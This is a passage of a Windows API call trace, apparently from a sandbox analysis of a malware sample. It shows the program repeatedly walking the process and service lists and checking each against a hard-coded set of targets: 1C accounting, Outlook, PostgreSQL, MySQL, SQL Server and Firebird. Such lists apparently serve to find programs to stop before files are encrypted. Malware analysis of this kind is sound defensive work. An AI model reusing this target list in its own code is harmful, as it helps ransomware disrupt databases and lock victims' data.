lpString2="svchost.exe") returned -1 [0273.034] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0273.034] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0273.034] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0273.034] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0273.034] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.034] lstrlenW (lpString="svchost.exe") returned 11 [0273.034] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.035] lstrlenW (lpString="svchost.exe") returned 11 [0273.035] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.035] lstrlenW (lpString="svchost.exe") returned 11 [0273.035] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.035] lstrlenW (lpString="svchost.exe") returned 11 [0273.035] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0273.036] lstrlenW (lpString="audiodg.exe") returned 11 [0273.036] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.036] lstrlenW (lpString="svchost.exe") returned 11 [0273.036] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.036] lstrlenW (lpString="svchost.exe") returned 11 [0273.036] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0273.036] lstrlenW (lpString="userinit.exe") returned 12 [0273.036] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0273.037] lstrlenW (lpString="dwm.exe") returned 7 [0273.037] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0273.037] lstrlenW (lpString="explorer.exe") returned 12 [0273.037] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0273.037] lstrlenW (lpString="spoolsv.exe") returned 11 [0273.037] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0273.037] lstrlenW (lpString="taskhost.exe") returned 12 [0273.037] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.038] lstrlenW (lpString="svchost.exe") returned 11 [0273.038] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0273.038] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0273.038] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0273.038] lstrlenW (lpString="reader_sl.exe") returned 13 [0273.038] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0273.039] CloseHandle (hObject=0x210) returned 1 [0273.039] Sleep (dwMilliseconds=0x1f4) [0273.740] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea330 [0273.891] EnumServicesStatusExW (in: hSCManager=0x47ea330, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0273.891] GetLastError () returned 0xea [0273.891] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe90) returned 0x3dec5a0 [0273.891] EnumServicesStatusExW (in: hSCManager=0x47ea330, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dec5a0, cbBufSize=0xe90, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dec5a0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0273.892] CloseServiceHandle (hSCObject=0x47ea330) returned 1 [0273.892] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0273.892] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0273.892] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0273.892] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0273.892] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0273.892] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0273.892] lstrlenW (lpString="AudioSrv") returned 8 [0273.892] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0273.892] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0273.892] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0273.892] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0273.892] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0273.892] lstrlenW (lpString="BFE") returned 3 [0273.892] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0273.892] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0273.892] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0273.892] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0273.892] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0273.892] lstrlenW (lpString="CryptSvc") returned 8 [0273.892] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0273.892] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0273.892] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0273.892] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0273.892] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0273.892] lstrlenW (lpString="CscService") returned 10 [0273.893] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0273.893] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0273.893] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0273.893] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0273.893] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0273.893] lstrlenW (lpString="DcomLaunch") returned 10 [0273.893] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0273.893] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0273.893] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0273.893] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0273.893] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0273.893] lstrlenW (lpString="Dhcp") returned 4 [0273.893] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0273.893] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0273.893] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0273.893] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0273.893] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0273.893] lstrlenW (lpString="Dnscache") returned 8 [0273.893] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0273.893] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0273.893] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0273.893] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0273.893] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0273.893] lstrlenW (lpString="DPS") returned 3 [0273.893] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0273.893] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0273.893] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0273.893] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0273.893] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0273.893] lstrlenW (lpString="eventlog") returned 8 [0273.893] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0273.893] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0273.893] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0273.893] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0273.894] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0273.894] lstrlenW (lpString="EventSystem") returned 11 [0273.894] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0273.894] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0273.894] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0273.894] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0273.894] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0273.894] lstrlenW (lpString="gpsvc") returned 5 [0273.894] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0273.894] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0273.894] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0273.894] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0273.894] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0273.894] lstrlenW (lpString="iphlpsvc") returned 8 [0273.894] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0273.894] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0273.894] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0273.894] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0273.894] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0273.894] lstrlenW (lpString="LanmanServer") returned 12 [0273.894] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0273.894] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0273.894] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0273.894] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0273.894] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0273.894] lstrlenW (lpString="LanmanWorkstation") returned 17 [0273.894] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0273.894] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0273.894] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0273.894] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0273.894] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0273.894] lstrlenW (lpString="lmhosts") returned 7 [0273.894] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0273.895] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0273.895] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0273.895] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0273.895] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0273.895] lstrlenW (lpString="MMCSS") returned 5 [0273.895] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0273.895] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0273.895] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0273.895] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0273.895] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0273.895] lstrlenW (lpString="MpsSvc") returned 6 [0273.895] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0273.895] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0273.895] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0273.895] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0273.895] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0273.895] lstrlenW (lpString="NlaSvc") returned 6 [0273.895] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0273.895] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0273.895] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0273.895] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0273.895] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0273.895] lstrlenW (lpString="nsi") returned 3 [0273.895] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0273.895] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0273.895] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0273.895] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0273.895] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0273.895] lstrlenW (lpString="PcaSvc") returned 6 [0273.895] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0273.895] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0273.895] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0273.895] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0273.896] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0273.896] lstrlenW (lpString="PlugPlay") returned 8 [0273.896] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0273.896] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0273.896] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0273.896] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0273.896] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0273.896] lstrlenW (lpString="Power") returned 5 [0273.896] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0273.896] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0273.896] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0273.896] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0273.896] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0273.896] lstrlenW (lpString="ProfSvc") returned 7 [0273.896] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0273.896] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0273.896] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0273.896] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0273.896] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0273.896] lstrlenW (lpString="RpcEptMapper") returned 12 [0273.896] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0273.896] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0273.896] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0273.896] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0273.896] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0273.896] lstrlenW (lpString="RpcSs") returned 5 [0273.896] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0273.896] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0273.896] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0273.896] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0273.896] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0273.896] lstrlenW (lpString="SamSs") returned 5 [0273.896] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0273.896] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0273.897] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0273.897] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0273.897] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0273.897] lstrlenW (lpString="Schedule") returned 8 [0273.897] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0273.897] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0273.897] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0273.897] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0273.897] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0273.897] lstrlenW (lpString="SENS") returned 4 [0273.897] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0273.897] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0273.897] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0273.897] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0273.897] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0273.897] lstrlenW (lpString="ShellHWDetection") returned 16 [0273.897] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0273.897] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0273.897] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0273.897] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0273.897] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0273.897] lstrlenW (lpString="Spooler") returned 7 [0273.897] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0273.897] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0273.897] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0273.897] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0273.897] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0273.897] lstrlenW (lpString="SysMain") returned 7 [0273.897] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0273.897] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0273.897] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0273.897] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0273.897] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0273.897] lstrlenW (lpString="Themes") returned 6 [0273.898] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0273.898] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0273.898] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0273.898] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0273.898] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0273.898] lstrlenW (lpString="TrkWks") returned 6 [0273.898] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0273.898] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0273.898] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0273.898] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0273.898] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0273.898] lstrlenW (lpString="UxSms") returned 5 [0273.898] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0273.898] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0273.898] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0273.898] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0273.898] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0273.898] lstrlenW (lpString="Winmgmt") returned 7 [0273.898] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0273.898] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0273.898] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0273.898] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0273.898] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0273.898] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dec5a0 | out: hHeap=0xb00000) returned 1 [0273.898] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x390 [0273.899] Process32FirstW (in: hSnapshot=0x390, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.899] Process32NextW (in: hSnapshot=0x390, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0273.900] lstrlenW (lpString="System") returned 6 [0273.900] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0273.900] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0273.900] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0273.900] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0273.900] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0273.900] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0273.900] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0273.900] Process32NextW (in: hSnapshot=0x390, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0273.900] lstrlenW (lpString="smss.exe") returned 8 [0273.900] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0273.900] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0273.900] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0273.900] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0273.900] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0273.900] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0273.900] 